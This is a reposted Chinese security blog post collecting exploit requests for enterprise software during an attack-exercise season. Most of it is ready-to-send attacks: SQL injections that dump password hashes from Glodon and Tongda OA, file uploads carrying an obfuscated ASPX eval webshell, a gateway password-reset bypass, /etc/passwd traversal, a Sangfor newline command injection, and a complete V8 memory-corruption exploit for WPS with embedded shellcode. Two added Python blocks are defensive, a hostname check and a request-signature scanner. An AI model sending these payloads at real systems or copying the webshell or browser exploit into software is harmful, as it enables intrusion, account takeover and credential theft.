Crazy Thursday HW Bulletin 2: a roundup of recent 0day POC/EXP

Posted by admin on 2023-08-10 20:24:45 (11,180 characters, about a 37-minute read)

For the PDF version, reply 0810 to the WeChat public account.

Glodon (广联达) OA SQL injection POC

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host: xxx.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: 
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 88

dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --

The injected UNION (T-SQL `top`, so the backend is SQL Server) pulls account codes and MD5 password hashes out of T_ORG_USER through the key parameter.

Glodon OA authenticated (back-office) file upload POC

POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
Host: 10.10.10.1:8888
X-Requested-With: Ext.basex
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Accept: */*
Origin: http://10.10.10.1
Referer: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40
Cookie: 
Connection: close
Content-Length: 421

------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; filename="1.aspx";filename="1.jpg"
Content-Type: application/text

<%@ Page Language="Jscript" Debug=true%><%var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD';var GFMA=Request.Form("qmq1");var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);eval(GFMA, ONOQ);%>
------WebKitFormBoundaryFfJZ4PlAZBixjELj--

Note the two filename parameters in a single Content-Disposition header. The uploaded page is an ASP.NET JScript eval shell that takes its input from the qmq1 form field.

Legendsec (网神) SecGate 3600 firewall obj_app_upfile arbitrary file upload POC

POST /?g=obj_app_upfile HTTP/1.1
Host: x.x.x.x
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 574
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)

------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="upfile"; filename="vulntest.php"
Content-Type: text/plain

<?php /* PHP webshell body goes here */ ?>
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundaryJpMyThWnAxbcBBQc--

Shell path: attachements/xxx.php

Legendsec SecSSL 3600 secure access gateway arbitrary password change POC

POST /changepass.php?type=2 
Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"test","subAuthId":"1"}

old_pass=&password=Test123!@&repassword=Test123!@

The account whose password is reset is the one named in this_name inside the forged last_step_param cookie; old_pass is left empty and the ticket value is arbitrary.

Weaver (泛微) OA code execution EXP

Description and scope
Weaver E-Office 9 has a code flaw in /inc/jquery/uploadify/uploadify.php: the way the Filedata parameter is handled allows an unrestricted file upload.
Affected: Weaver E-Office 9.0

POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: 192.168.232.137:8082
User-Agent: test
Connection: close
Content-Length: 493
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="Filedata"; filename="666.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--
--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--

Tongda (通达) OA (CVE-2023-4166)

Description and scope
Tongda OA is collaborative office automation software developed in-house by Beijing Tongda Xinke Technology Co., Ltd., a general-purpose office management platform aimed at every industry.
Scope of this issue: Tongda OA versions before 11.10.

GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1
Host: 192.168.232.137:8098
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=1u7tsd1cpgp9qvco726smb50h5; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=779f3f46
Upgrade-Insecure-Requests: 1

This is a heavy-query blind injection: substr(DATABASE(),1,1)=char(84) guesses that the first character of the database name is 'T', and the self-join of information_schema.columns is only evaluated when that guess is true, so a correct guess shows up as a noticeably slower response. The request carries an admin session cookie, so the injection is authenticated.

Weaver E-Office 9 unauthenticated file inclusion

http://URL/E-mobile/App/Init.php?weiApi=1&sessionkey=ee651bec023d0db0c233fcb562ec7673_admin&m=12344554_../../attachment/xxx.xls

Kingsoft (金山) WPS RCE

Affected WPS versions: WPS Office 2023 Personal < 11.1.0.15120
WPS Office 2019 Enterprise < 11.8.2.12085
POC
Start an HTTP server in the directory containing 1.html, listening on port 80, and add this entry to the hosts file (the test hard-codes the name):

127.0.0.1 clientweb.docer.wps.cn.cloudwps.cn

The bug triggers when the hostname matches the rule clientweb.docer.wps.cn.{xxxxx}wps.cn; cloudwps.cn has no relationship to wps.cn, so the trust decision is keyed on the start and end of the hostname rather than on the registrable domain.
The code block is below. (For the original PDF, add me on WeChat.)

<script>
if (typeof alert === "undefined") { alert = console.log; }

// Float64 <-> two Uint32 views, used for type punning throughout.
let f64 = new Float64Array(1);
let u32 = new Uint32Array(f64.buffer);
function d2u(v) { f64[0] = v; return u32; }
function u2d(lo, hi) { u32[0] = lo; u32[1] = hi; return f64[0]; }

function gc() { // major GC
  for (let i = 0; i < 0x10; i++) { new Array(0x100000); }
}

// Leaks an internal hole value out of optimized code via Error.prepareStackTrace.
function foo(bug) {
  function C(z) {
    Error.prepareStackTrace = function (t, B) { return B[z].getThis(); };
    let p = Error().stack;
    Error.prepareStackTrace = null;
    return p;
  }
  function J() {}
  var optim = false;
  var opt = new Function('a', 'b', 'c',
    'if(typeof a==="number"){if(a>2){for(var i=0;i<100;i++);return;}b.d(a,b,1);return}' +
    'g++;'.repeat(70));
  var e = null;
  J.prototype.d = new Function('a', 'b', '"use strict";b.a.call(arguments,b);return arguments[a];');
  J.prototype.a = new Function('a', 'a.b(0,a)');
  J.prototype.b = new Function('a', 'b', 'b.c();if(a){' + 'g++;'.repeat(70) + '}');
  J.prototype.c = function () {
    if (optim) {
      var z = C(3);
      var p = C(3);
      z[0] = 0;
      e = {M: z, C: p};
    }
  };
  var a = new J();
  // JIT warm-up
  if (bug) {
    for (var V = 0; 1E4 > V; V++) {
      opt(0 == V % 4 ? 1 : 4, a, 1);
    }
  }
  optim = true;
  opt(1, a, 1);
  return e;
}

e1 = foo(false);
e2 = foo(true);
delete e2.M[0];
let hole = e2.C[0];

// Corrupt a Map with the leaked hole so that oob_array ends up with an oversized length.
let map = new Map();
map.set('asd', 8);
map.set(hole, 0x8);
map.delete(hole);
map.delete(hole);
map.delete("asd");
map.set(0x20, "aaaa");
let arr3 = new Array(0);
let arr4 = new Array(0);
let arr5 = new Array(1);
let oob_array = [];
oob_array.push(1.1);
map.set("1", -1);
let obj_array = {m: 1337, target: gc};
let ab = new ArrayBuffer(1337);

// Find obj_array behind oob_array: 0xa72 is 1337 as a 32-bit Smi (1337 << 1).
let object_idx = undefined;
let object_idx_flag = undefined;
let max_size = 0x1000;
for (let i = 0; i < max_size; i++) {
  if (d2u(oob_array[i])[0] === 0xa72) { object_idx = i; object_idx_flag = 1; break; }
  if (d2u(oob_array[i])[1] === 0xa72) { object_idx = i + 1; object_idx_flag = 0; break; }
}

function addrof(obj_para) {
  obj_array.target = obj_para;
  let addr = d2u(oob_array[object_idx])[object_idx_flag] - 1;
  obj_array.target = gc;
  return addr;
}

function fakeobj(addr) {
  let r8 = d2u(oob_array[object_idx]);
  if (object_idx_flag === 0) { oob_array[object_idx] = u2d(addr, r8[1]); }
  else { oob_array[object_idx] = u2d(r8[0], addr); }
  return obj_array.target;
}

// Find the ArrayBuffer by its raw byte length (1337); its backing-store pointer follows.
let bk_idx = undefined;
let bk_idx_flag = undefined;
for (let i = 0; i < max_size; i++) {
  if (d2u(oob_array[i])[0] === 1337) { bk_idx = i; bk_idx_flag = 1; break; }
  if (d2u(oob_array[i])[1] === 1337) { bk_idx = i + 1; bk_idx_flag = 0; break; }
}

// Arbitrary read/write by retargeting the ArrayBuffer's backing store.
let dv = new DataView(ab);
function get_32(addr) {
  let r8 = d2u(oob_array[bk_idx]);
  if (bk_idx_flag === 0) { oob_array[bk_idx] = u2d(addr, r8[1]); }
  else { oob_array[bk_idx] = u2d(r8[0], addr); }
  let val = dv.getUint32(0, true);
  oob_array[bk_idx] = u2d(r8[0], r8[1]);
  return val;
}

function set_32(addr, val) {
  let r8 = d2u(oob_array[bk_idx]);
  if (bk_idx_flag === 0) { oob_array[bk_idx] = u2d(addr, r8[1]); }
  else { oob_array[bk_idx] = u2d(r8[0], addr); }
  dv.setUint32(0, val, true);
  oob_array[bk_idx] = u2d(r8[0], r8[1]);
}

function write8(addr, val) {
  let r8 = d2u(oob_array[bk_idx]);
  if (bk_idx_flag === 0) { oob_array[bk_idx] = u2d(addr, r8[1]); }
  else { oob_array[bk_idx] = u2d(r8[0], addr); }
  dv.setUint8(0, val);
}

// Make oob_array's elements store agree with its corrupted length.
let fake_length = get_32(addrof(oob_array) + 12);
set_32(get_32(addrof(oob_array) + 8) + 4, fake_length);

// Minimal wasm module exporting main(); its instance gives us an RWX page to overwrite.
let wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
let wasm_mod = new WebAssembly.Module(wasm_code);
let wasm_instance = new WebAssembly.Instance(wasm_mod);
let f = wasm_instance.exports.main;
let target_addr = addrof(wasm_instance) + 0x40;
let rwx_mem = get_32(target_addr);
//alert("rwx_mem is " + rwx_mem.toString(16));

// x86 Windows shellcode; the trailing bytes spell "calc".
const shellcode = new Uint8Array([
  0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xc0, 0x64,
  0x8b, 0x50, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28,
  0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c,
  0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2, 0x52, 0x57, 0x8b, 0x52,
  0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78, 0xe3, 0x48, 0x01, 0xd1,
  0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49, 0x18, 0xe3, 0x3a, 0x49,
  0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0xac, 0xc1, 0xcf, 0x0d, 0x01,
  0xc7, 0x38, 0xe0, 0x75, 0xf6, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75,
  0xe4, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b,
  0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24,
  0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x5f, 0x5f, 0x5a,
  0x8b, 0x12, 0xeb, 0x8d, 0x5d, 0x6a, 0x01, 0x8d, 0x85, 0xb2, 0x00, 0x00,
  0x00, 0x50, 0x68, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xe0, 0x1d,
  0x2a, 0x0a, 0x68, 0xa6, 0x95, 0xbd, 0x9d, 0xff, 0xd5, 0x3c, 0x06, 0x7c,
  0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a,
  0x00, 0x53, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x00
]);
for (let i = 0; i < shellcode.length; i++) { write8(rwx_mem + i, shellcode[i]); }
f();
</script>
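The hostname rule in the WPS note above is a matching problem, not a DNS problem. The following is an added example and not WPS code: looks_trusted_loose models the shape the post describes (the expected name at the front, the vendor zone at the end, anything in between), while is_trusted_strict compares on label boundaries and therefore rejects a lookalike zone such as cloudwps.cn. Both function names and the non-hosts-file hostnames are illustrative.

```python
"""Host-trust matching of the shape described in the WPS note above.

Added example, not WPS code. The post says the trigger host must look like
clientweb.docer.wps.cn.{xxxxx}wps.cn, so the trusted name is being matched
by prefix and suffix instead of as a registrable domain. looks_trusted_loose
models that shape; is_trusted_strict is the label-boundary check that
rejects a lookalike zone such as cloudwps.cn. Function names are illustrative.
"""
from __future__ import annotations

TRUSTED_HOST = "clientweb.docer.wps.cn"
TRUSTED_ZONE = "wps.cn"


def looks_trusted_loose(host: str) -> bool:
    """The shape the post describes: right front, right end, anything between."""
    host = host.lower().rstrip(".")
    return host.startswith(TRUSTED_HOST) and host.endswith(TRUSTED_ZONE)


def is_trusted_strict(host: str) -> bool:
    """Accept wps.cn itself or a subdomain of it; the dot before the zone is mandatory,
    so cloudwps.cn (no dot) is not a match."""
    host = host.lower().rstrip(".")
    return host == TRUSTED_ZONE or host.endswith("." + TRUSTED_ZONE)


def compare(hosts: list[str]) -> dict[str, tuple[bool, bool]]:
    """(loose, strict) verdict per host."""
    return {h: (looks_trusted_loose(h), is_trusted_strict(h)) for h in hosts}


if __name__ == "__main__":
    # First entry is the hosts-file name from the post; the others are constructed.
    for host, (loose, strict) in compare([
        "clientweb.docer.wps.cn.cloudwps.cn",
        "clientweb.docer.wps.cn",
        "clientweb.docer.wps.cn.attacker.test",
    ]).items():
        print(f"{host:40} loose={loose!s:5} strict={strict}")
```

The loose check accepts the hosts-file name from the post because it starts with the expected host and ends with wps.cn; the strict check rejects it because the zone is cloudwps.cn, which is a different registrable domain.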

NSFOCUS (绿盟) SAS security audit system arbitrary file read

/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd

Sangfor (sxf) Report: version-limited, 7.0.8 to 7.0.8R5

POST /rep/login HTTP/1.1
Host: 
Cookie: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 126

clsMode=cls_mode_login&index=index&log_type=report&page=login&rnd=0.7550103466497915&userID=admin%0Aid -a %0A&userPsw=tmbhuisq

The injection is the %0A-delimited `id -a` inside userID: the newline turns it into a separate command in whatever the login handler hands the user name to. The password value is arbitrary.
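The requests above share a handful of shapes a defender can match on a WAF or proxy log: UNION/information_schema probes (Glodon, Tongda), repeated ../ (NSFOCUS SAS), a %0A newline smuggled into a login field (Sangfor Report), and multipart uploads with an executable extension or a doubled filename parameter (Glodon, SecGate, E-Office). The following is an added example, not code from the original post or from any of these vendors; it parses a raw HTTP request and reports which of those shapes it matches. The sample requests are constructed from the POCs above with hosts, cookies and shell bodies replaced, and the function names are my own.

```python
"""Request-pattern checks for the POC shapes collected on this page.

Added example, not code from the original post or any vendor: parse one raw
HTTP request and report which of the page's POC shapes it matches. SAMPLES
are constructed from the POCs above with hosts, cookies and shell bodies
replaced.
"""
from __future__ import annotations

import re
from urllib.parse import unquote_plus

# Extensions the web server would execute if the upload lands in webroot.
EXEC_EXT = re.compile(r"\.(php\d?|phtml|aspx?|ashx|jspx?)$", re.I)
SQLI = re.compile(r"union\s+all\s+select|information_schema\.|substr\(\s*database\(\)", re.I)
FILENAME = re.compile(r'filename="([^"]*)"', re.I)


def parse_request(raw: str) -> tuple[str, str, dict[str, str], str]:
    """Split a raw request into (method, target, lower-cased headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target = lines[0].split()[:2]
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def inspect_request(raw: str) -> list[str]:
    """Return the matched signatures; an empty list means nothing matched."""
    _, target, headers, body = parse_request(raw)
    multipart = "multipart/form-data" in headers.get("content-type", "")
    # Decode once so %20/%0A and '+' cannot hide keywords; multipart bodies
    # are not URL-encoded and are searched as-is.
    decoded = unquote_plus(target) + "\n" + (body if multipart else unquote_plus(body))
    findings: list[str] = []

    if SQLI.search(decoded):
        findings.append("sqli: UNION/information_schema/DATABASE() in parameters")
    if decoded.count("../") >= 3:
        findings.append("traversal: repeated ../ in path or parameters")

    if multipart:
        for disp in re.findall(r"Content-Disposition:[^\n]*", body, re.I):
            names = FILENAME.findall(disp)
            if len(names) > 1:  # two filename= params: parser-differential bypass
                findings.append(f"multipart: duplicate filename params {names}")
            if any(EXEC_EXT.search(n) for n in names):
                findings.append(f"multipart: executable upload {names}")
    else:
        # Split before decoding so an encoded '&' cannot create fake fields.
        for field in body.split("&"):
            name, _, value = field.partition("=")
            value = unquote_plus(value)
            if "\n" in value or "\r" in value:
                findings.append(f"newline in form field {name!r}")
    return findings


# Constructed samples based on the POCs above (hosts, cookies, shell bodies replaced).
SAMPLES = {
    "tongda_sqli": (
        "GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20"
        "(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20"
        "information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1\r\n"
        "Host: oa.example.test\r\nCookie: PHPSESSID=x\r\n\r\n"),
    "sxf_cmdi": (
        "POST /rep/login HTTP/1.1\r\nHost: rep.example.test\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
        "clsMode=cls_mode_login&page=login&userID=admin%0Aid -a %0A&userPsw=x"),
    "glodon_upload": (
        "POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1\r\n"
        "Host: oa.example.test\r\nContent-Type: multipart/form-data; boundary=XX\r\n\r\n"
        "--XX\r\nContent-Disposition: form-data; filename=\"1.aspx\";filename=\"1.jpg\"\r\n"
        "Content-Type: application/text\r\n\r\n<%@ Page %>\r\n--XX--\r\n"),
    "sas_traversal": (
        "GET /webconf/GetFile/index?path=../../../../../../../../etc/passwd HTTP/1.1\r\n"
        "Host: sas.example.test\r\n\r\n"),
    "benign": "GET /index.html HTTP/1.1\r\nHost: www.example.test\r\n\r\n",
}


def scan_samples() -> dict[str, list[str]]:
    """Run inspect_request over every constructed sample."""
    return {name: inspect_request(raw) for name, raw in SAMPLES.items()}


if __name__ == "__main__":
    for name, hits in scan_samples().items():
        print(f"{name}: {hits or 'clean'}")
```

These are signatures, not a parser for each product, so they say nothing about whether a given target is vulnerable; they are a cheap way to spot the POCs above being replayed against a fleet, and the URL-decoding step is what keeps the %20 and %0A variants from slipping past a plain substring match.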

nday news sync

1. Hikvision integrated security platform unauthenticated file upload. The vendor's fix for this one is flawed: you can still jump to the web root via ..., just through a different endpoint.
2. Landray OA unauthenticated code execution. Landray V13/14/15 need no introduction; last year the code-execution and Kinggrid (金格) interface bugs were hit hard, and after this year's big update Landray still has plenty of RCE issues.
3. Seeyon M3 Server-xxxx deserialization. Those who know, know.
4. Seeyon A8 V8 SP1/SP2 file upload (1day). A lot was fixed at the start of this year, but the ajaxdo interface's ajaxAction still exposes many file-operation methods.
5. Primeton EOS unauthenticated code execution. This system has far too many code-execution issues to list; a rewrite is recommended.
6. Weaver E-cology authenticated file upload (0day): read xxx from the database, then write it to the web root. Apart from a few circulating 1days, Weaver can be called basically secure; the RASP can be bypassed but I don't want to spend more effort on it. This bug is a bypass of last year's unauthenticated one.
7. Weaver E-Mobile arbitrary user login (1day). Follow-up exploitation from E-Mobile is hard, but worth watching where there is information-leak risk.
8. Weaver E-Office 10 information disclosure + authenticated file upload (0day). A very strong chain; E-Office 9 has too many bugs and too few deployments to be worth writing up.
9. Qiyuesuo (契约锁) e-signature system RCE (1day). Fixed during a certain Shanghai operation; patches came fast, this e-signature vendor responds quickly. Often sold bundled with Weaver E-cology.
10. ESAFENET (亿赛通) electronic document platform file upload. The upload 1days on the market were all patched last year; there are new ones this year, worth attention.
11. IDocView command execution. Found on a project last year, still present this year.
12. JeeSite code execution (0day). Even Ding Zhen would have to call it real.
13. LiveBOS file upload. Financial-sector supply chain; no longer needs the directory traversal of previous years, and the upload bypass in the new version's framework is... emmm.
14. Yonyou NC Cloud arbitrary file write (0day). Most NC Cloud instances seen this year have not patched.
15. The "number one" VPN vendor: binary bugs are expected to be hit hard again this year. PWN the port!
16. xx IOA PWN. Zero trust is not necessarily secure.
17. xxx NAC PWN. Remember to fix weak passwords too.
18. Sangfor Application Delivery command execution.
19. DzzOffice collaborative office documents unauthorized access.
20. E-signature platform code execution.
21. Weaver OA admin-backend access.
22. UCloud unauthorized retrieval of arbitrary user cookies.
23. Feishu client RCE.
24. Weaver E-Office V10 unauthenticated RCE.
25. Laiketui (来客推) mall arbitrary file upload.
26. Tianming (天明) bastion host 0day.
27. Mingyu (明御) O&M audit and risk control system (bastion host) arbitrary user registration.
28. Collaborative management system SQL injection.
29. Weaver E-Mobile injection.
30. TRS WCM arbitrary command execution.
31. Yonyou Finance Cloud arbitrary file upload.

Did you get it today?

(Meme image captions from the original post)
This is RT, right? Trying to give BT a heart attack.
Your turn to post.
I've seen spicier ones.
The only goal: survive to the end.
It rhymes.
No no, you mustn't...

Originally published on the WeChat public account 老李安全: 疯狂星期四HW快报② 近日0dayPOC/EXP一览

Reposted by admin on CN-SEC (中文网), with thanks to the original author. Keep this link when reposting: http://cn-sec.com/archives/1947262.html
